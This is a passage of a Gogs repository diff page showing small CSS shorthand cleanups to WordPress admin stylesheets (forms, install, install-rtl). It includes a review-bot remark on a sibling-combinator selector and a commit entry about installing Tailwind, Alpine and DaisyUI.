1528 1535
 	#pass-strength-result {
1529 1536
 		width: 100%;
1530 1537
 		box-sizing: border-box;
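Review bot: The new selector `.form-table .regular-text ~ input[type="text"].small-text` uses the general sibling combinator, so it matches every later `small-text` input that shares a parent with a `.regular-text` element, not only the one directly after it. If only the immediately following field needs the `margin-top: 5px`, `+` would be the narrower match. The same rule is added in forms-rtl.css.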
@@ -1559,13 +1566,13 @@ table.form-table td .updated p {
1559 1566
 	}
1560 1567
 
1561 1568
 	.form-table th {
1562
-		padding: 10px 0 0 0;
1569
+		padding: 10px 0 0;
1563 1570
 		border-bottom: 0;
1564 1571
 	}
1565 1572
 
1566 1573
 	.form-table td {
1567 1574
 		margin-bottom: 0;
1568
-		padding: 4px 0 6px 0;
1575
+		padding: 4px 0 6px;
1569 1576
 	}
1570 1577
 
1571 1578
 	.form-table.permalink-structure td code {

File diff suppressed because it is too large
+ 1 - 1
app/wp-admin/css/forms.min.css


+ 3 - 3
app/wp-admin/css/install-rtl.css

@@ -10,7 +10,7 @@ body {
10 10
 	color: #3c434a;
11 11
 	font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;
12 12
 	margin: 140px auto 25px;
13
-	padding: 20px 20px 10px 20px;
13
+	padding: 20px 20px 10px;
14 14
 	max-width: 700px;
15 15
 	-webkit-font-smoothing: subpixel-antialiased;
16 16
 	box-shadow: 0 1px 1px rgba(0, 0, 0, 0.04);
@@ -79,7 +79,7 @@ label {
79 79
 
80 80
 #logo {
81 81
 	margin: -130px auto 25px;
82
-	padding: 0 0 25px 0;
82
+	padding: 0 0 25px;
83 83
 	width: 84px;
84 84
 	height: 84px;
85 85
 	overflow: hidden;
@@ -142,7 +142,7 @@ textarea {
142 142
 }
143 143
 
144 144
 .form-table p {
145
-	margin: 4px 0 0 0;
145
+	margin: 4px 0 0;
146 146
 	font-size: 11px;
147 147
 }
148 148
 

File diff suppressed because it is too large
+ 1 - 1
app/wp-admin/css/install-rtl.min.css


+ 3 - 3
app/wp-admin/css/install.css

@@ -9,7 +9,7 @@ body {
9 9
 	color: #3c434a;
10 10
 	font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;
11 11
 	margin: 140px auto 25px;
12
-	padding: 20px 20px 10px 20px;
12
+	padding: 20px 20px 10px;
13 13
 	max-width: 700px;
14 14
 	-webkit-font-smoothing: subpixel-antialiased;
15 15
 	box-shadow: 0 1px 1px rgba(0, 0, 0, 0.04);
@@ -78,7 +78,7 @@ label {
78 78
 
79 79
 #logo {
80 80
 	margin: -130px auto 25px;
81
-	padding: 0 0 25px 0;
81
+	padding: 0 0 25px;
82 82
 	width: 84px;
83 83
 	height: 84px;
84 84
 	overflow: hidden;
@@ -141,7 +141,7 @@ textarea {
141 141
 }
142 142
 
143 143
 .form-table p {
144
-	margin: 4px 0 0 0;
144
+	margin: 4px 0 0;
145 145
 	font-size: 11px;
146 146
 }
147 147
 

File diff suppressed because it is too large
+ 1 - 1
app/wp-admin/css/install.min.css


+ 0 - 0
app/wp-admin/css/list-tables-rtl.css


Some files were not shown because too many files changed in this diff

tum/tmt_learning - Gogs: Simplico Git Service

1 Commits (6f337d0a21bd600b37e67ff4f8517676d8b4089d)

Author SHA1 Message Date
  Prach Pongpanich 6f337d0a21 install tailwind alpine daisyui 2 years ago